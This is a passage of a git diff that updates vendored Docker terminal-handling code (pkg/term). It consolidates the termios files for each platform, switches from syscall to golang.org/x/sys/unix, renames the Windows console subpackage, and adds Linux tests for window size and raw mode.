a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go deleted file mode 100644 index 59dac5ba8e..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go +++ /dev/null @@ -1,50 +0,0 @@ -// +build linux,cgo - -package term - -import ( - "syscall" - "unsafe" -) - -// #include -import "C" - -// Termios is the Unix API for terminal I/O. -// It is passthrough for syscall.Termios in order to make it portable with -// other platforms where it is not available or handled differently. 
-type Termios syscall.Termios - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if err := tcget(fd, &oldState.termios); err != 0 { - return nil, err - } - - newState := oldState.termios - - C.cfmakeraw((*C.struct_termios)(unsafe.Pointer(&newState))) - if err := tcset(fd, &newState); err != 0 { - return nil, err - } - return &oldState, nil -} - -func tcget(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} - -func tcset(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_other.go b/vendor/github.com/docker/docker/pkg/term/tc_other.go deleted file mode 100644 index 750d7c3f60..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/tc_other.go +++ /dev/null @@ -1,20 +0,0 @@ -// +build !windows -// +build !linux !cgo -// +build !solaris !cgo - -package term - -import ( - "syscall" - "unsafe" -) - -func tcget(fd uintptr, p *Termios) syscall.Errno { - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p))) - return err -} - -func tcset(fd uintptr, p *Termios) syscall.Errno { - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p))) - return err -} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go deleted file mode 100644 index c9139d0ca8..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go +++ /dev/null @@ -1,63 +0,0 @@ -// +build solaris,cgo - -package term - -import ( - "syscall" - 
"unsafe" -) - -// #include -import "C" - -// Termios is the Unix API for terminal I/O. -// It is passthrough for syscall.Termios in order to make it portable with -// other platforms where it is not available or handled differently. -type Termios syscall.Termios - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if err := tcget(fd, &oldState.termios); err != 0 { - return nil, err - } - - newState := oldState.termios - - newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON | syscall.IXANY) - newState.Oflag &^= syscall.OPOST - newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) - newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) - newState.Cflag |= syscall.CS8 - - /* - VMIN is the minimum number of characters that needs to be read in non-canonical mode for it to be returned - Since VMIN is overloaded with another element in canonical mode when we switch modes it defaults to 4. It - needs to be explicitly set to 1. 
- */ - newState.Cc[C.VMIN] = 1 - newState.Cc[C.VTIME] = 0 - - if err := tcset(fd, &newState); err != 0 { - return nil, err - } - return &oldState, nil -} - -func tcget(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} - -func tcset(fd uintptr, p *Termios) syscall.Errno { - ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) - if ret != 0 { - return err.(syscall.Errno) - } - return 0 -} diff --git a/vendor/github.com/docker/docker/pkg/term/term.go b/vendor/github.com/docker/docker/pkg/term/term.go index fe59faa949..0589a95519 100644 --- a/vendor/github.com/docker/docker/pkg/term/term.go +++ b/vendor/github.com/docker/docker/pkg/term/term.go @@ -2,7 +2,7 @@ // Package term provides structures and helper functions to work with // terminal (state, sizes). -package term +package term // import "github.com/docker/docker/pkg/term" import ( "errors" @@ -10,7 +10,8 @@ import ( "io" "os" "os/signal" - "syscall" + + "golang.org/x/sys/unix" ) var ( @@ -31,7 +32,7 @@ type Winsize struct { y uint16 } -// StdStreams returns the standard streams (stdin, stdout, stedrr). +// StdStreams returns the standard streams (stdin, stdout, stderr). func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { return os.Stdin, os.Stdout, os.Stderr } @@ -79,7 +80,7 @@ func SaveState(fd uintptr) (*State, error) { // descriptor, with echo disabled. 
func DisableEcho(fd uintptr, state *State) error { newState := state.termios - newState.Lflag &^= syscall.ECHO + newState.Lflag &^= unix.ECHO if err := tcset(fd, &newState); err != 0 { return err diff --git a/vendor/github.com/docker/docker/pkg/term/term_linux_test.go b/vendor/github.com/docker/docker/pkg/term/term_linux_test.go new file mode 100644 index 0000000000..272395a10e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_linux_test.go @@ -0,0 +1,117 @@ +//+build linux + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" +) + +// RequiresRoot skips tests that require root, unless the test.root flag has +// been set +func RequiresRoot(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("skipping test that requires root") + return + } +} + +func newTtyForTest(t *testing.T) (*os.File, error) { + RequiresRoot(t) + return os.OpenFile("/dev/tty", os.O_RDWR, os.ModeDevice) +} + +func newTempFile() (*os.File, error) { + return ioutil.TempFile(os.TempDir(), "temp") +} + +func TestGetWinsize(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + winSize, err := GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.Assert(t, winSize != nil) + + newSize := Winsize{Width: 200, Height: 200, x: winSize.x, y: winSize.y} + err = SetWinsize(tty.Fd(), &newSize) + assert.NilError(t, err) + winSize, err = GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.DeepEqual(t, *winSize, newSize, cmpWinsize) +} + +var cmpWinsize = cmp.AllowUnexported(Winsize{}) + +func TestSetWinsize(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + winSize, err := GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.Assert(t, winSize != nil) + newSize := Winsize{Width: 200, Height: 200, x: winSize.x, y: winSize.y} + err = SetWinsize(tty.Fd(), &newSize) + assert.NilError(t, err) + winSize, 
err = GetWinsize(tty.Fd()) + assert.NilError(t, err) + assert.DeepEqual(t, *winSize, newSize, cmpWinsize) +} + +func TestGetFdInfo(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + inFd, isTerminal := GetFdInfo(tty) + assert.Equal(t, inFd, tty.Fd()) + assert.Equal(t, isTerminal, true) + tmpFile, err := newTempFile() + assert.NilError(t, err) + defer tmpFile.Close() + inFd, isTerminal = GetFdInfo(tmpFile) + assert.Equal(t, inFd, tmpFile.Fd()) + assert.Equal(t, isTerminal, false) +} + +func TestIsTerminal(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + isTerminal := IsTerminal(tty.Fd()) + assert.Equal(t, isTerminal, true) + tmpFile, err := newTempFile() + assert.NilError(t, err) + defer tmpFile.Close() + isTerminal = IsTerminal(tmpFile.Fd()) + assert.Equal(t, isTerminal, false) +} + +func TestSaveState(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + state, err := SaveState(tty.Fd()) + assert.NilError(t, err) + assert.Assert(t, state != nil) + tty, err = newTtyForTest(t) + assert.NilError(t, err) + defer tty.Close() + err = RestoreTerminal(tty.Fd(), state) + assert.NilError(t, err) +} + +func TestDisableEcho(t *testing.T) { + tty, err := newTtyForTest(t) + defer tty.Close() + assert.NilError(t, err) + state, err := SetRawTerminal(tty.Fd()) + defer RestoreTerminal(tty.Fd(), state) + assert.NilError(t, err) + assert.Assert(t, state != nil) + err = DisableEcho(tty.Fd(), state) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_solaris.go b/vendor/github.com/docker/docker/pkg/term/term_solaris.go deleted file mode 100644 index 112debbec5..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/term_solaris.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build solaris - -package term - -import ( - "syscall" - "unsafe" -) - -/* -#include -#include -#include - -// Small wrapper to get rid of variadic args of 
ioctl() -int my_ioctl(int fd, int cmd, struct winsize *ws) { - return ioctl(fd, cmd, ws); -} -*/ -import "C" - -// GetWinsize returns the window size based on the specified file descriptor. -func GetWinsize(fd uintptr) (*Winsize, error) { - ws := &Winsize{} - ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCGWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) - // Skip retval = 0 - if ret == 0 { - return ws, nil - } - return ws, err -} - -// SetWinsize tries to set the specified window size for the specified file descriptor. -func SetWinsize(fd uintptr, ws *Winsize) error { - ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCSWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) - // Skip retval = 0 - if ret == 0 { - return nil - } - return err -} diff --git a/vendor/github.com/docker/docker/pkg/term/term_unix.go b/vendor/github.com/docker/docker/pkg/term/term_unix.go deleted file mode 100644 index ddf87a0e58..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/term_unix.go +++ /dev/null @@ -1,29 +0,0 @@ -// +build !solaris,!windows - -package term - -import ( - "syscall" - "unsafe" -) - -// GetWinsize returns the window size based on the specified file descriptor. -func GetWinsize(fd uintptr) (*Winsize, error) { - ws := &Winsize{} - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(ws))) - // Skipp errno = 0 - if err == 0 { - return ws, nil - } - return ws, err -} - -// SetWinsize tries to set the specified window size for the specified file descriptor. 
-func SetWinsize(fd uintptr, ws *Winsize) error { - _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCSWINSZ), uintptr(unsafe.Pointer(ws))) - // Skipp errno = 0 - if err == 0 { - return nil - } - return err -} diff --git a/vendor/github.com/docker/docker/pkg/term/term_windows.go b/vendor/github.com/docker/docker/pkg/term/term_windows.go index a91f07e482..64ead3c53b 100644 --- a/vendor/github.com/docker/docker/pkg/term/term_windows.go +++ b/vendor/github.com/docker/docker/pkg/term/term_windows.go @@ -1,12 +1,10 @@ -// +build windows - -package term +package term // import "github.com/docker/docker/pkg/term" import ( "io" "os" "os/signal" - "syscall" + "syscall" // used for STD_INPUT_HANDLE, STD_OUTPUT_HANDLE and STD_ERROR_HANDLE "github.com/Azure/go-ansiterm/winterm" "github.com/docker/docker/pkg/term/windows" @@ -23,25 +21,18 @@ type Winsize struct { Width uint16 } -const ( - // https://msdn.microsoft.com/en-us/library/windows/desktop/ms683167(v=vs.85).aspx - enableVirtualTerminalInput = 0x0200 - enableVirtualTerminalProcessing = 0x0004 - disableNewlineAutoReturn = 0x0008 -) - -// vtInputSupported is true if enableVirtualTerminalInput is supported by the console +// vtInputSupported is true if winterm.ENABLE_VIRTUAL_TERMINAL_INPUT is supported by the console var vtInputSupported bool -// StdStreams returns the standard streams (stdin, stdout, stedrr). +// StdStreams returns the standard streams (stdin, stdout, stderr). func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { // Turn on VT handling on all std handles, if possible. This might // fail, in which case we will fall back to terminal emulation. var emulateStdin, emulateStdout, emulateStderr bool fd := os.Stdin.Fd() if mode, err := winterm.GetConsoleMode(fd); err == nil { - // Validate that enableVirtualTerminalInput is supported, but do not set it. 
- if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalInput); err != nil { + // Validate that winterm.ENABLE_VIRTUAL_TERMINAL_INPUT is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_INPUT); err != nil { emulateStdin = true } else { vtInputSupported = true @@ -53,21 +44,21 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { fd = os.Stdout.Fd() if mode, err := winterm.GetConsoleMode(fd); err == nil { - // Validate disableNewlineAutoReturn is supported, but do not set it. - if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + // Validate winterm.DISABLE_NEWLINE_AUTO_RETURN is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING|winterm.DISABLE_NEWLINE_AUTO_RETURN); err != nil { emulateStdout = true } else { - winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING) } } fd = os.Stderr.Fd() if mode, err := winterm.GetConsoleMode(fd); err == nil { - // Validate disableNewlineAutoReturn is supported, but do not set it. - if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + // Validate winterm.DISABLE_NEWLINE_AUTO_RETURN is supported, but do not set it. 
+ if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING|winterm.DISABLE_NEWLINE_AUTO_RETURN); err != nil { emulateStderr = true } else { - winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING) } } @@ -78,20 +69,24 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { emulateStderr = false } + // Temporarily use STD_INPUT_HANDLE, STD_OUTPUT_HANDLE and + // STD_ERROR_HANDLE from syscall rather than x/sys/windows as long as + // go-ansiterm hasn't switch to x/sys/windows. + // TODO: switch back to x/sys/windows once go-ansiterm has switched if emulateStdin { - stdIn = windows.NewAnsiReader(syscall.STD_INPUT_HANDLE) + stdIn = windowsconsole.NewAnsiReader(syscall.STD_INPUT_HANDLE) } else { stdIn = os.Stdin } if emulateStdout { - stdOut = windows.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE) + stdOut = windowsconsole.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE) } else { stdOut = os.Stdout } if emulateStderr { - stdErr = windows.NewAnsiWriter(syscall.STD_ERROR_HANDLE) + stdErr = windowsconsole.NewAnsiWriter(syscall.STD_ERROR_HANDLE) } else { stdErr = os.Stderr } @@ -101,7 +96,7 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { // GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal. func GetFdInfo(in interface{}) (uintptr, bool) { - return windows.GetHandleInfo(in) + return windowsconsole.GetHandleInfo(in) } // GetWinsize returns the window size based on the specified file descriptor. @@ -121,7 +116,7 @@ func GetWinsize(fd uintptr) (*Winsize, error) { // IsTerminal returns true if the given file descriptor is a terminal. 
func IsTerminal(fd uintptr) bool { - return windows.IsConsole(fd) + return windowsconsole.IsConsole(fd) } // RestoreTerminal restores the terminal connected to the given file descriptor @@ -179,9 +174,9 @@ func SetRawTerminalOutput(fd uintptr) (*State, error) { return nil, err } - // Ignore failures, since disableNewlineAutoReturn might not be supported on this + // Ignore failures, since winterm.DISABLE_NEWLINE_AUTO_RETURN might not be supported on this // version of Windows. - winterm.SetConsoleMode(fd, state.mode|disableNewlineAutoReturn) + winterm.SetConsoleMode(fd, state.mode|winterm.DISABLE_NEWLINE_AUTO_RETURN) return state, err } @@ -211,7 +206,7 @@ func MakeRaw(fd uintptr) (*State, error) { mode |= winterm.ENABLE_INSERT_MODE mode |= winterm.ENABLE_QUICK_EDIT_MODE if vtInputSupported { - mode |= enableVirtualTerminalInput + mode |= winterm.ENABLE_VIRTUAL_TERMINAL_INPUT } err = winterm.SetConsoleMode(fd, mode) diff --git a/vendor/github.com/docker/docker/pkg/term/termios_bsd.go b/vendor/github.com/docker/docker/pkg/term/termios_bsd.go new file mode 100644 index 0000000000..48b16f5203 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_bsd.go @@ -0,0 +1,42 @@ +// +build darwin freebsd openbsd netbsd + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "unsafe" + + "golang.org/x/sys/unix" +) + +const ( + getTermios = unix.TIOCGETA + setTermios = unix.TIOCSETA +) + +// Termios is the Unix API for terminal I/O. +type Termios unix.Termios + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. 
+func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON) + newState.Oflag &^= unix.OPOST + newState.Lflag &^= (unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN) + newState.Cflag &^= (unix.CSIZE | unix.PARENB) + newState.Cflag |= unix.CS8 + newState.Cc[unix.VMIN] = 1 + newState.Cc[unix.VTIME] = 0 + + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go deleted file mode 100644 index 480db900ac..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go +++ /dev/null @@ -1,69 +0,0 @@ -package term - -import ( - "syscall" - "unsafe" -) - -const ( - getTermios = syscall.TIOCGETA - setTermios = syscall.TIOCSETA -) - -// Termios magic numbers, passthrough to the ones defined in syscall. -const ( - IGNBRK = syscall.IGNBRK - PARMRK = syscall.PARMRK - INLCR = syscall.INLCR - IGNCR = syscall.IGNCR - ECHONL = syscall.ECHONL - CSIZE = syscall.CSIZE - ICRNL = syscall.ICRNL - ISTRIP = syscall.ISTRIP - PARENB = syscall.PARENB - ECHO = syscall.ECHO - ICANON = syscall.ICANON - ISIG = syscall.ISIG - IXON = syscall.IXON - BRKINT = syscall.BRKINT - INPCK = syscall.INPCK - OPOST = syscall.OPOST - CS8 = syscall.CS8 - IEXTEN = syscall.IEXTEN -) - -// Termios is the Unix API for terminal I/O. 
-type Termios struct { - Iflag uint64 - Oflag uint64 - Cflag uint64 - Lflag uint64 - Cc [20]byte - Ispeed uint64 - Ospeed uint64 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { - return nil, err - } - - newState := oldState.termios - newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) - newState.Oflag &^= OPOST - newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) - newState.Cflag &^= (CSIZE | PARENB) - newState.Cflag |= CS8 - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { - return nil, err - } - - return &oldState, nil -} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go deleted file mode 100644 index ed843ad69c..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go +++ /dev/null @@ -1,69 +0,0 @@ -package term - -import ( - "syscall" - "unsafe" -) - -const ( - getTermios = syscall.TIOCGETA - setTermios = syscall.TIOCSETA -) - -// Termios magic numbers, passthrough to the ones defined in syscall. 
-const ( - IGNBRK = syscall.IGNBRK - PARMRK = syscall.PARMRK - INLCR = syscall.INLCR - IGNCR = syscall.IGNCR - ECHONL = syscall.ECHONL - CSIZE = syscall.CSIZE - ICRNL = syscall.ICRNL - ISTRIP = syscall.ISTRIP - PARENB = syscall.PARENB - ECHO = syscall.ECHO - ICANON = syscall.ICANON - ISIG = syscall.ISIG - IXON = syscall.IXON - BRKINT = syscall.BRKINT - INPCK = syscall.INPCK - OPOST = syscall.OPOST - CS8 = syscall.CS8 - IEXTEN = syscall.IEXTEN -) - -// Termios is the Unix API for terminal I/O. -type Termios struct { - Iflag uint32 - Oflag uint32 - Cflag uint32 - Lflag uint32 - Cc [20]byte - Ispeed uint32 - Ospeed uint32 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { - return nil, err - } - - newState := oldState.termios - newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) - newState.Oflag &^= OPOST - newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) - newState.Cflag &^= (CSIZE | PARENB) - newState.Cflag |= CS8 - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { - return nil, err - } - - return &oldState, nil -} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_linux.go b/vendor/github.com/docker/docker/pkg/term/termios_linux.go index 22921b6aef..6d4c63fdb7 100644 --- a/vendor/github.com/docker/docker/pkg/term/termios_linux.go +++ b/vendor/github.com/docker/docker/pkg/term/termios_linux.go @@ -1,46 +1,38 @@ -// +build !cgo - -package term +package term // import "github.com/docker/docker/pkg/term" import ( - "syscall" - "unsafe" + "golang.org/x/sys/unix" ) 
const ( - getTermios = syscall.TCGETS - setTermios = syscall.TCSETS + getTermios = unix.TCGETS + setTermios = unix.TCSETS ) // Termios is the Unix API for terminal I/O. -type Termios struct { - Iflag uint32 - Oflag uint32 - Cflag uint32 - Lflag uint32 - Cc [20]byte - Ispeed uint32 - Ospeed uint32 -} +type Termios unix.Termios // MakeRaw put the terminal connected to the given file descriptor into raw // mode and returns the previous state of the terminal so that it can be // restored. func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + termios, err := unix.IoctlGetTermios(int(fd), getTermios) + if err != nil { return nil, err } - newState := oldState.termios + var oldState State + oldState.termios = Termios(*termios) - newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON) - newState.Oflag &^= syscall.OPOST - newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) - newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) - newState.Cflag |= syscall.CS8 + termios.Iflag &^= (unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON) + termios.Oflag &^= unix.OPOST + termios.Lflag &^= (unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN) + termios.Cflag &^= (unix.CSIZE | unix.PARENB) + termios.Cflag |= unix.CS8 + termios.Cc[unix.VMIN] = 1 + termios.Cc[unix.VTIME] = 0 - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 { + if err := unix.IoctlSetTermios(int(fd), setTermios, termios); err != nil { return nil, err } return &oldState, nil diff --git a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go deleted file 
mode 100644 index ed843ad69c..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go +++ /dev/null @@ -1,69 +0,0 @@ -package term - -import ( - "syscall" - "unsafe" -) - -const ( - getTermios = syscall.TIOCGETA - setTermios = syscall.TIOCSETA -) - -// Termios magic numbers, passthrough to the ones defined in syscall. -const ( - IGNBRK = syscall.IGNBRK - PARMRK = syscall.PARMRK - INLCR = syscall.INLCR - IGNCR = syscall.IGNCR - ECHONL = syscall.ECHONL - CSIZE = syscall.CSIZE - ICRNL = syscall.ICRNL - ISTRIP = syscall.ISTRIP - PARENB = syscall.PARENB - ECHO = syscall.ECHO - ICANON = syscall.ICANON - ISIG = syscall.ISIG - IXON = syscall.IXON - BRKINT = syscall.BRKINT - INPCK = syscall.INPCK - OPOST = syscall.OPOST - CS8 = syscall.CS8 - IEXTEN = syscall.IEXTEN -) - -// Termios is the Unix API for terminal I/O. -type Termios struct { - Iflag uint32 - Oflag uint32 - Cflag uint32 - Lflag uint32 - Cc [20]byte - Ispeed uint32 - Ospeed uint32 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. 
-func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { - return nil, err - } - - newState := oldState.termios - newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) - newState.Oflag &^= OPOST - newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) - newState.Cflag &^= (CSIZE | PARENB) - newState.Cflag |= CS8 - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { - return nil, err - } - - return &oldState, nil -} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go index cb0b88356d..1d7c452cc8 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go @@ -1,6 +1,6 @@ // +build windows -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "bytes" diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go index a3ce5697d9..7799a03fc5 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go @@ -1,6 +1,6 @@ // +build windows -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/term/windows/console.go b/vendor/github.com/docker/docker/pkg/term/windows/console.go index ca5c3b2e53..5274019758 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/console.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/console.go @@ -1,6 +1,6 @@ // +build 
windows -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows.go b/vendor/github.com/docker/docker/pkg/term/windows/windows.go index ce4cb5990e..3e5593ca6a 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/windows.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows.go @@ -2,15 +2,15 @@ // When asked for the set of standard streams (e.g., stdin, stdout, stderr), the code will create // and return pseudo-streams that convert ANSI sequences to / from Windows Console API calls. -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "io/ioutil" "os" "sync" - ansiterm "github.com/Azure/go-ansiterm" - "github.com/Sirupsen/logrus" + "github.com/Azure/go-ansiterm" + "github.com/sirupsen/logrus" ) var logger *logrus.Logger diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go index 52aeab54ec..80cda601fa 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go @@ -1,3 +1,3 @@ // This file is necessary to pass the Docker tests. -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" diff --git a/vendor/github.com/docker/docker/pkg/term/winsize.go b/vendor/github.com/docker/docker/pkg/term/winsize.go new file mode 100644 index 0000000000..a19663ad83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/winsize.go @@ -0,0 +1,20 @@ +// +build !windows + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "golang.org/x/sys/unix" +) + +// GetWinsize returns the window size based on the specified file descriptor. 
